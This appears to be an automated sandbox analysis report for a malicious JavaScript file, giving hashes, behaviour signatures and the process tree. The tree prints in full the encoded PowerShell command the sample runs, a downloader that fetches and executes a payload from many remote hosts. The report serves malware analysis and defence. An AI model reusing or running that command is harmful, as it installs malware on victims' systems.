1e567b4015164976fee603e26a6bff005f1d0bee5c66f2b55c5a715d318a3699

General

Target

cz3EfRwcgvveH.js
Size

345KB
MD5

35ce6e13e1f3b40f19dd2e7c2f4d8bda
SHA1

f314f524514b951d1c05c108c0ed7739c1d77331
SHA256

1e567b4015164976fee603e26a6bff005f1d0bee5c66f2b55c5a715d318a3699
SHA512

12b7779c9b55ae9a98b87015c092b1f9a2f27458c655d6cdadb08583f8b90a615be3fa637bd85c7d371702d14f96be0a88407748ac663294d168b61d42e02109
SSDEEP

6144:bSfr0dh2tgcH6YTkM0cNRcpZwg/EBQ+8N/ygD1pRbxVvALN5IAbghS:bSfrSh2tgcH6YTkMXRcpZwg/QQ+I/ygQ

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
900	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	900	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 1996 wrote to memory of 900	1996	wscript.exe	28
PID 1996 wrote to memory of 900	1996	wscript.exe	28
PID 1996 wrote to memory of 900	1996	wscript.exe	28

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\cz3EfRwcgvveH.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1996
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JAB2AGEAbgBlAHMAcwBhAFMAaABhAGkAawBoACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBqAEEARwA4AEEAYgBnAEIAMABBAEgASQBBAFkAUQBCAHcAQQBHADgAQQBjAHcAQgBwAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEwAZwBCAGsAQQBHADgAQQBkAHcAQgB1AEEARwB3AEEAYgB3AEIAaABBAEcAUQBBACIAOwAkAHAAZQByAHMAaQBzAHQAZQByAHMARABvAGwAYQBiAHIAYQB0AGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEkAQQBOAEEAQQB6AEEAQwA0AEEATQBnAEEAeABBAEQAQQBBAEwAZwBBAHgAQQBEAE0AQQBNAFEAQQB1AEEARABRAEEATQBBAEEAPQB6AHEARQBEAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAWABBAEcAZwBBAGEAUQBCAHMAQQBHAFUAQQBaAFEAQgB1AEEARgBJAEEAWgBRAEIAdQBBAEgAVQBBAGIAZwBCAGoAQQBHAGsAQQBZAFEAQgAwAEEARwA4AEEAYwBnAEIANQBBAEMANABBAFoAdwBCAHMAQQBHADgAQQBZAGcAQgBoAEEARwB3AEEAIgA7ACQAQwBoAGkAdgBlAHMAVQBuAHAAcgBpAG0AaQB0AGkAdgBlAG4AZQBzAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFEAQQBHAGcAQQBlAFEAQgBzAEEARwA4AEEAWgB3AEIAbABBAEcANABBAGEAUQBCAHoAQQBIAFEAQQBMAGcAQgBqAEEASABJAEEAWgBRAEIAawBBAEcAawBBAGQAQQBBAD0AUgByAD0ASABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAGsAQQBOAHcAQQB1AEEARABnAEEATwBBAEEAdQBBAEQASQBBAE0AdwBBAHcAQQBDADQAQQBPAEEAQQA0AEEAQQA9AD0AIgA7ACQASQBuAGMAcgBhAHMAaABBAHAAbABhAG4AYQB0AGkAcwBtACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQA0AEEAZABRAEIAdABBAEcAVQBBAGMAZwBCAHYAQQBIAE0AQQBaAFEAQgBUAEEARwBnAEEAYgB3AEIAdgBBAEcAcwBBAGMAdwBBAHUAQQBHADAAQQBiAHcAQgBpAEEARwBrAEEATAB3AEIANgBBAEMAOABBAFcAUQBBAD0AeQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADQAQQBZAFEAQgB5AEEARwBNAEEAYgB3AEIAbwBBAEgAawBBAGMAQQBCAHUAQQBHADgAQQBkAEEAQgBwAEEARwBNAEEATABnAEIAagBBAEcAOABBAGIAdwBCAHMAQQBDADgAQQBZAFEAQQB2AEEARABNAEEAWQBRAEIAWABBAEEAPQA9AHkAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQBnAEEAdQBBAEQARQBBAE0AdwBBAHgAQQBDADQAQQBNAGcAQQB4AEEARABZAEEATABnAEEAeQBBAEQARQBBAE4AZwBBAHYAQQBIAGcAQQBSAGcAQQB2AEEARQBFAEEAeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAE0AQQBOAEEAQQB1AEEARABJAEEATQBnAEEAeQBBAEMANABBAE4AUQBBAHcAQQBDADQAQQBOAEEAQQA1AEEAQwA4AEEAWgBnAEEAdgBBAEcAUQBBAGEAUQBCAFgAQQBIAGsAQQBOAGcAQQA9AHkAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABVAEEATABnAEEAeABBAEQASQBBAE0AZwBBAHUAQQBEAEUAQQBNAFEAQQAwAEEAQwA0AEEATwBBAEEAMwBBAEMAOABBAGIAUQBCAHUAQQBIAFkAQQBMAHcAQQA0AEEAQQA9AD0AeQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAGcAQQBaAFEAQgBtAEEASABRAEEAWgBRAEIAeQBBAEUANABBAGIAdwBCAHUAQQBHAFUAQQBiAGcAQgBrAEEARwA4AEEAZAB3AEIAdABBAEcAVQBBAGIAZwBCADAAQQBDADQAQQBaAHcAQgB2AEEARwB3AEEAWgBnAEEAdgBBAEYARQBBAEwAdwBBADUAQQBHAGcAQQBZAGcAQgBYAEEAQQA9AD0AeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AUQBBADMAQQBDADQAQQBOAHcAQQB3AEEAQwA4AEEAWQB3AEIARQBBAEYATQBBAGQAUQBCAEgAQQBHAEkAQQBMAHcAQQA1AEEASABvAEEATgBBAEIAbgBBAEQAVQBBAGEAZwBCADYAQQBIAFUAQQBPAEEAQgBQAEEAQQA9AD0AeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AUQBBADMAQQBDADQAQQBOAGcAQQA1AEEAQwA4AEEATgB3AEIANABBAEgAWQBBAGIAZwBCAG8AQQBEAEUAQQBXAFEAQQB2AEEARABFAEEAYQBnAEIAUABBAEcAYwBBAE4AQQBCAEQAQQBFAFUAQQBPAEEAQQA9AHkAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE0AZwBBAHgAQQBDADQAQQBNAFEAQQAzAEEAQwA0AEEATQBRAEEAMABBAEMAOABBAE8AQQBCAEMAQQBIAG8AQQBMAHcAQgB5AEEARwBVAEEAZQBRAEEAMgBBAEQARQBBAFQAQQBCAFEAQQBHAHcAQQBjAEEAQgBVAEEAQQA9AD0AIgA7ACQAcwBoAGkAcAB3AHIAaQBnAGgAdABzAEMAbwB1AG4AdABlAHIAcwBsAG8AcABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBrAEEAYgBnAEIAeQBBAEcAawBBAFoAdwBCAG8AQQBIAFEAQQBaAFEAQgBrAEEARQBRAEEAWQBRAEIAdABBAEcARQBBAFoAdwBCAGwAQQBHAEUAQQBZAGcAQgBzAEEARwBVAEEATABnAEIAagBBAEcAOABBAGIAUQBBAD0ATQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAFEAQQBhAFEAQgB6AEEARwBVAEEAYgBRAEIAdwBBAEcAdwBBAGIAdwBCADUAQQBDADQAQQBiAEEAQgBsAEEARwBjAEEAWQBRAEIAcwBBAEEAPQA9AE0AYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABVAEEAYgBBAEIAMABBAEgASQBBAFkAUQBCAHAAQQBHADQAQQBkAGcAQgB2AEEARwB3AEEAZABnAEIAbABBAEcAUQBBAFYAdwBCAHYAQQBIAEkAQQBaAEEAQgB6AEEASABRAEEAWgBRAEIAeQBBAEMANABBAGQAdwBCAGwAQQBHAEkAQQBjAHcAQgBwAEEASABRAEEAWgBRAEEAPQAiADsAJAB1AG4AYwBvAG0AcAByAGUAaABlAG4AcwBpAHYAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgASQBBAFoAUQBCAGoAQQBHAEUAQQBkAEEAQgBoAEEARwB3AEEAYgB3AEIAbgBBAEgAVQBBAGEAUQBCAHUAQQBHAGMAQQBXAEEAQgBwAEEASABBAEEAYQBBAEIAcABBAEgAVQBBAGMAdwBBAHUAQQBHAE0AQQBiAHcAQgB2AEEARwB3AEEARgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAFEAQQAxAEEAQwA0AEEATgBBAEEANABBAEMANABBAE0AUQBBADAAQQBEAEUAQQBMAGcAQQB4AEEARABjAEEATwBRAEEAPQAiADsAJABwAGkAbgBjAGgAYQBiAGwAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAVQBBAGQAUQBCAHcAQQBHAGcAQQBZAFEAQgAxAEEASABNAEEAYQBRAEIAaABBAEMANABBAGEAdwBCAGgAQQBIAFUAQQBaAGcAQgBsAEEARwA0AEEAaABlAFgAbABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBRAEEAMwBBAEQAWQBBAEwAZwBBAHkAQQBEAE0AQQBOAEEAQQB1AEEARABRAEEATQBRAEEAPQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABtAGUAdABhAGwAZQBkACAAaQBuACAAJABJAG4AYwByAGEAcwBoAEEAcABsAGEAbgBhAHQAaQBzAG0AIAAtAHMAcABsAGkAdAAgACIAeQAiACkAIAB7AHQAcgB5ACAAewAkAE0AaQBjAHIAbwBuAHMASQBuAHYAaQBhAGIAaQBsAGkAdAB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgAzAEEARwBVAEEAWQBRAEIAMABBAEcAZwBBAFoAUQBCAHkAQQBHAEkAQQBjAGcAQgBsAEEARwBFAEEAYQB3AEIAVgBBAEcANABBAGIAUQBCAHYAQQBHAFEAQQBaAFEAQgB6AEEASABRAEEAYgBBAEIANQBBAEMANABBAFkAdwBCAHkAQQBHAFUAQQBaAEEAQgBwAEEASABRAEEAWQB3AEIAaABBAEgASQBBAFoAQQBBAD0AbABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAE0AQQBhAHcAQgBsAEEARwB3AEEAZABBAEIAdgBBAEcANABBAGEAUQBCAGoAQQBHAEUAQQBiAEEAQgBIAEEASABVAEEAYgBnAEIAMABBAEcAVQBBAGMAZwBBAHUAQQBHAE0AQQBiAHcAQgAxAEEARwA0AEEAZABBAEIAeQBBAEgAawBBAGwAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABNAEEAYgB3AEIAagBBAEcAawBBAGIAZwBCAHAAQQBHAEUAQQBiAGcAQgBwAEEASABNAEEAZABBAEIAcABBAEcATQBBAEwAZwBCAG4AQQBIAEkAQQBhAFEAQgB3AEEARwBVAEEAbABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADEAQQBEAE0AQQBMAGcAQQAyAEEARABFAEEATABnAEEAeABBAEQAZwBBAE4AQQBBAHUAQQBEAEUAQQBOAGcAQQA1AEEAQQA9AD0AIgA7ACQAaABvAHIAbgBzAHQAbwBuAGUASABvAG0AZQBiAG8AZABpAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMQBBAEQAQQBBAEwAZwBBAHgAQQBEAFUAQQBNAEEAQQB1AEEARABFAEEATgBBAEEAMQBBAEMANABBAE0AUQBBADIAQQBEAFkAQQAiADsAJABUAGkAbgB0AGUAcgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATwBRAEEAMgBBAEMANABBAE4AZwBBADMAQQBDADQAQQBNAFEAQQB6AEEARABnAEEATABnAEEANABBAEQAQQBBACIAOwAkAFAAYQBuAGkAbwBuAGkAYQBNAGkAbgBpAHMAdABlAHIAaQB1AG0AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbQBlAHQAYQBsAGUAZAApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAFAAYQBuAGkAbwBuAGkAYQBNAGkAbgBpAHMAdABlAHIAaQB1AG0AIAAtAE8AIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwAdQBuAGEAbQBwAGwAeQBMAGEAbgBpAGYAbABvAHIAbwB1AHMALgBTAHUAYgBpAG4AZABpAGMAYQB0AGUAUgBvAHAAZQB0AHIAaQBjAGsAOwAkAGEAbABsAG8AdAByAG8AcABoAGkAYwBIAGUAbQBhAHQAbwBjAGwAYQBzAGkAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIATgBBAEcAOABBAGIAZwBCAHYAQQBIAEEAQQBhAEEAQgB2AEEARwA0AEEAYQBRAEIAbABBAEgATQBBAFMAQQBCADUAQQBIAEEAQQBaAFEAQgB5AEEARwA4AEEAZQBBAEIANQBBAEcAYwBBAFoAUQBCAHUAQQBHAGsAQQBlAGcAQgBwAEEARwA0AEEAWgB3AEEAdQBBAEcAWQBBAGQAUQBCADAAQQBHAEkAQQBiAHcAQgBzAEEAQQA9AD0AIgA7ACQAYQBkAGUAbQBwAHQAQQBiAGIAbwB0AG4AdQBsAGwAaQB1AHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAFEAQQB3AEEAQwA0AEEATQBRAEEAMgBBAEQASQBBAEwAZwBBAHgAQQBEAFUAQQBOAGcAQQB1AEEARABFAEEATwBRAEEAMQBBAEEAPQA9AHgAdQBCAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AUQBBADAAQQBDADQAQQBNAGcAQQAwAEEARABVAEEATABnAEEAeABBAEQATQBBAE0AQQBBAHUAQQBEAEUAQQBNAHcAQQAyAEEAQQA9AD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwAdQBuAGEAbQBwAGwAeQBMAGEAbgBpAGYAbABvAHIAbwB1AHMALgBTAHUAYgBpAG4AZABpAGMAYQB0AGUAUgBvAHAAZQB0AHIAaQBjAGsAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAyADMAMgA2ADcANgApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAZABRAEIAdQBBAEcARQBBAGIAUQBCAHcAQQBHAHcAQQBlAFEAQgBNAEEARwBFAEEAYgBnAEIAcABBAEcAWQBBAGIAQQBCAHYAQQBIAEkAQQBiAHcAQgAxAEEASABNAEEATABnAEIAVABBAEgAVQBBAFkAZwBCAHAAQQBHADQAQQBaAEEAQgBwAEEARwBNAEEAWQBRAEIAMABBAEcAVQBBAFUAZwBCAHYAQQBIAEEAQQBaAFEAQgAwAEEASABJAEEAYQBRAEIAagBBAEcAcwBBAEwAQQBCAHQAQQBIAFUAQQBjAHcAQgAwAEEARABzAEEAIgA7ACQATgBvAHMAaQBuAGcAUABvAGwAeQBoAGEAcgBtAG8AbgB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBaAEEARwBFAEEAZAB3AEIAdwBBAEcAVQBBAGMAZwBBAHUAQQBIAFkAQQBaAFEAQgB1AEEASABRAEEAZABRAEIAeQBBAEcAVQBBAGMAdwBBAD0AcgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEkAQQBNAFEAQQB1AEEARABrAEEATwBBAEEAdQBBAEQAYwBBAE0AUQBBAHUAQQBEAEUAQQBOAFEAQQAxAEEAQQA9AD0AIgA7ACQAQgBlAG4AZQBmAGEAYwB0AG8AcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAegBBAEgAUQBBAGIAdwBCAHUAQQBHAFUAQQBaAGcAQgBzAEEARwBrAEEAWgBRAEIAegBBAEMANABBAFkAdwBCAGgAQQBIAEEAQQBhAFEAQgAwAEEARwBFAEEAYgBBAEEAPQBoAHcAcgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAG4AQQBHAEUAQQBkAFEAQgB6AEEASABNAEEAYgBRAEIAbABBAEgAUQBBAFoAUQBCAHkAQQBDADQAQQBhAEEAQgBsAEEARwBFAEEAYgBBAEIAMABBAEcAZwBBAFkAdwBCAGgAQQBIAEkAQQBaAFEAQQA9ACIAOwAkAFMAbwBvAHQAaABpAG4AZwBQAGUAZQBwAHMAaABvAHcAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADAAQQBhAFEAQgB6AEEASABRAEEAZABRAEIAdQBBAEcAVQBBAEwAZwBCAGwAQQBHADQAQQBaAHcAQgBwAEEARwA0AEEAWgBRAEIAbABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQAiADsAYgByAGUAYQBrADsAfQB9ACAAYwBhAHQAYwBoACAAewB9AH0A"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:900

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/900-58-0x000000001B2A0000-0x000000001B582000-memory.dmp

Filesize
2.9MB

Download
memory/900-59-0x00000000023E0000-0x00000000023E8000-memory.dmp

Filesize
32KB

Download
memory/900-60-0x0000000002840000-0x00000000028C0000-memory.dmp

Filesize
512KB

Download
memory/900-61-0x0000000002840000-0x00000000028C0000-memory.dmp

Filesize
512KB

Download
memory/900-62-0x000000000284B000-0x0000000002882000-memory.dmp

Filesize
220KB

Download

Analysis

Sharing